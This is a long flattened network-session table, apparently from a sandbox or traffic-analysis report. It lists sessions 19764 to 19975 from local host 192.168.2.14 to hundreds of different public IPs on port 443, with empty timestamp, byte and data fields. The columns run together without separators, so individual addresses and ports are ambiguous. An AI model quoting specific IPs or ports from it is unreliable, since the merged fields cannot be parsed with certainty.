                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19764192.168.2.1441222191.184.191.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19765192.168.2.144867684.31.249.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19766192.168.2.1446114135.8.225.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19767192.168.2.144770090.105.128.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19768192.168.2.1449438169.13.136.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19769192.168.2.144925432.223.160.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19770192.168.2.1439054137.90.17.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19771192.168.2.1437448169.201.240.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19772192.168.2.1450544149.249.197.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19773192.168.2.1447796154.43.77.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19774192.168.2.1451022156.206.24.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19775192.168.2.1434364160.40.47.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19776192.168.2.1446544181.65.119.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19777192.168.2.143941845.39.116.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19778192.168.2.1438084136.62.19.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19779192.168.2.1452410139.49.105.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19780192.168.2.1454286199.40.19.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19781192.168.2.146041084.82.118.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19782192.168.2.1435764176.219.247.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19783192.168.2.143574819.15.101.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19784192.168.2.146055638.36.125.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19785192.168.2.144098814.111.57.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19786192.168.2.1447852204.178.221.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19787192.168.2.1459046212.112.225.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19788192.168.2.144443832.232.26.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19789192.168.2.145585498.193.46.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19790192.168.2.144714672.120.202.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19791192.168.2.1451598144.58.117.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19792192.168.2.143350642.35.40.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19793192.168.2.1452170102.213.224.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19794192.168.2.145911012.45.250.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19795192.168.2.1459642174.108.101.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19796192.168.2.1437824182.56.164.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19797192.168.2.1454126115.12.230.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19798192.168.2.1435686202.37.162.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19799192.168.2.1458164221.88.213.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19800192.168.2.1437944105.17.17.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19801192.168.2.143913284.249.165.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19802192.168.2.145168079.60.235.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19803192.168.2.1439332203.214.77.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19804192.168.2.143340641.27.146.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19805192.168.2.1459526161.79.34.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19806192.168.2.1459294199.130.1.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19807192.168.2.1456820221.130.232.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19808192.168.2.1437946208.100.217.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19809192.168.2.1456076173.90.46.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19810192.168.2.1436444193.189.30.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19811192.168.2.1456240199.53.218.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19812192.168.2.1437034223.81.197.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19813192.168.2.144758675.172.121.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19814192.168.2.1446780126.212.189.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19815192.168.2.1452570210.101.136.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19816192.168.2.1445874178.73.96.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19817192.168.2.1439914125.86.200.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19818192.168.2.1449890150.18.67.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19819192.168.2.1432826165.17.254.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19820192.168.2.1450342156.224.217.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19821192.168.2.145639818.1.137.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19822192.168.2.1448456205.40.246.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19823192.168.2.144549239.115.184.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19824192.168.2.1450452129.249.142.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19825192.168.2.144482471.110.167.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19826192.168.2.146070478.18.125.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19827192.168.2.146080493.201.247.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19828192.168.2.1455744155.47.181.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19829192.168.2.1439016142.199.214.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19830192.168.2.1446168183.38.233.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19831192.168.2.1460952143.178.239.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19832192.168.2.143292265.24.159.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19833192.168.2.1455674216.221.116.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19834192.168.2.1455122172.38.142.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19835192.168.2.14361944.111.252.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19836192.168.2.1446946217.228.40.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19837192.168.2.1442858143.122.226.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19838192.168.2.14409849.253.7.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19839192.168.2.1437588183.67.230.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19840192.168.2.1456290194.190.52.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19841192.168.2.1440550175.62.105.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19842192.168.2.14470361.12.193.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19843192.168.2.1458686150.78.185.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19844192.168.2.1443514158.79.73.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19845192.168.2.144621661.209.182.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19846192.168.2.1437922106.94.33.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19847192.168.2.1439386204.231.216.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19848192.168.2.1452620206.67.138.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19849192.168.2.1452426196.244.225.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19850192.168.2.1440170136.127.113.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19851192.168.2.145786284.139.209.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19852192.168.2.14608901.247.142.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19853192.168.2.1435528190.11.41.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19854192.168.2.1457562198.193.16.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19855192.168.2.1445464139.175.141.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19856192.168.2.1456384194.222.155.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19857192.168.2.144077843.222.93.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19858192.168.2.1452778172.67.20.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19859192.168.2.1445498112.76.3.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19860192.168.2.1456196138.75.154.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19861192.168.2.144459845.198.113.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19862192.168.2.145279249.170.168.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19863192.168.2.1435542104.47.202.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19864192.168.2.145203869.34.129.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19865192.168.2.145595867.68.46.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19866192.168.2.1448602151.109.21.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19867192.168.2.1447202105.247.39.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19868192.168.2.1450832190.42.231.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19869192.168.2.1435160113.240.40.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19870192.168.2.1450762131.8.40.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19871192.168.2.1460954212.227.153.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19872192.168.2.145705453.11.11.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19873192.168.2.1457802196.121.83.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19874192.168.2.1450820209.81.76.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19875192.168.2.1435436106.194.132.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19876192.168.2.1458624173.1.7.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19877192.168.2.1442718150.61.142.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19878192.168.2.144242691.133.82.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19879192.168.2.1458420186.246.42.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19880192.168.2.1447630187.91.163.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19881192.168.2.1436054109.86.59.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19882192.168.2.144781257.148.162.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19883192.168.2.1433968209.210.75.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19884192.168.2.1438574207.140.200.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19885192.168.2.1457550171.89.214.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19886192.168.2.1447606211.73.28.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19887192.168.2.1458422123.230.136.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19888192.168.2.1437092149.69.238.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19889192.168.2.144058462.238.101.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19890192.168.2.1442026180.198.58.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19891192.168.2.143281481.1.36.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19892192.168.2.1449074165.142.52.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19893192.168.2.144738659.158.51.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19894192.168.2.1434444159.34.121.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19895192.168.2.1452524201.16.115.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19896192.168.2.144458825.108.179.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19897192.168.2.14567169.155.242.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19898192.168.2.14606762.146.216.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19899192.168.2.1445098191.93.189.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19900192.168.2.1454422128.30.176.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19901192.168.2.1436156131.209.69.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19902192.168.2.1460332213.201.141.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19903192.168.2.1455258169.248.91.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19904192.168.2.1453432118.252.17.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19905192.168.2.1434826170.62.209.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19906192.168.2.145079245.18.177.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19907192.168.2.1433846176.175.12.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19908192.168.2.144594293.153.141.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19909192.168.2.1443152166.106.82.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19910192.168.2.145241860.216.83.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19911192.168.2.1443952221.144.48.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19912192.168.2.1455702146.34.252.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19913192.168.2.144257239.228.145.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19914192.168.2.145943234.236.251.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19915192.168.2.1459632221.141.59.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19916192.168.2.1460194131.197.117.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19917192.168.2.145402454.137.251.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19918192.168.2.1444674165.227.196.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19919192.168.2.1448930192.175.133.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19920192.168.2.1441656196.2.32.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19921192.168.2.1455410213.20.162.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19922192.168.2.145876891.249.183.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19923192.168.2.146006825.214.77.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19924192.168.2.1435088181.37.174.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19925192.168.2.1439300150.19.22.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19926192.168.2.145150478.1.223.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19927192.168.2.145252047.251.2.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19928192.168.2.143836058.52.29.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19929192.168.2.1438846196.226.247.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19930192.168.2.1454434206.101.119.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19931192.168.2.143822091.238.220.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19932192.168.2.1442520122.236.109.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19933192.168.2.145061093.82.93.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19934192.168.2.1456492181.128.224.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19935192.168.2.143601293.89.242.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19936192.168.2.143952413.178.209.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19937192.168.2.143867043.120.214.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19938192.168.2.1437834122.43.114.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19939192.168.2.1442662123.130.138.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19940192.168.2.1456254157.110.30.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19941192.168.2.1454422163.253.253.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19942192.168.2.1456016155.17.220.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19943192.168.2.1439358194.170.71.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19944192.168.2.1437206169.61.12.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19945192.168.2.1456394213.163.100.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19946192.168.2.1442452122.68.182.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19947192.168.2.143376631.117.96.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19948192.168.2.1447346165.135.37.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19949192.168.2.143507232.26.124.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19950192.168.2.1434686213.208.92.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19951192.168.2.1454134141.237.78.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19952192.168.2.1433342192.0.52.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19953192.168.2.144406619.176.72.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19954192.168.2.1432780205.155.124.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19955192.168.2.1449002156.116.6.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19956192.168.2.1441894124.199.84.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19957192.168.2.1443324149.12.119.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19958192.168.2.1435104129.20.238.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19959192.168.2.1460772189.244.151.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19960192.168.2.1452440188.197.97.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19961192.168.2.144215690.230.90.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19962192.168.2.145715887.8.225.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19963192.168.2.1434088159.229.242.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19964192.168.2.1442864203.236.251.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19965192.168.2.145592225.238.211.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19966192.168.2.145570643.198.250.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19967192.168.2.1447138180.146.199.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19968192.168.2.143974248.5.98.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19969192.168.2.1458136124.180.177.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19970192.168.2.1435640195.6.90.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19971192.168.2.1454010202.191.253.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19972192.168.2.1449604191.246.28.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19973192.168.2.1455244171.217.24.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19974192.168.2.144513642.101.81.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19975192.168.2.1443968204.181.67.44443
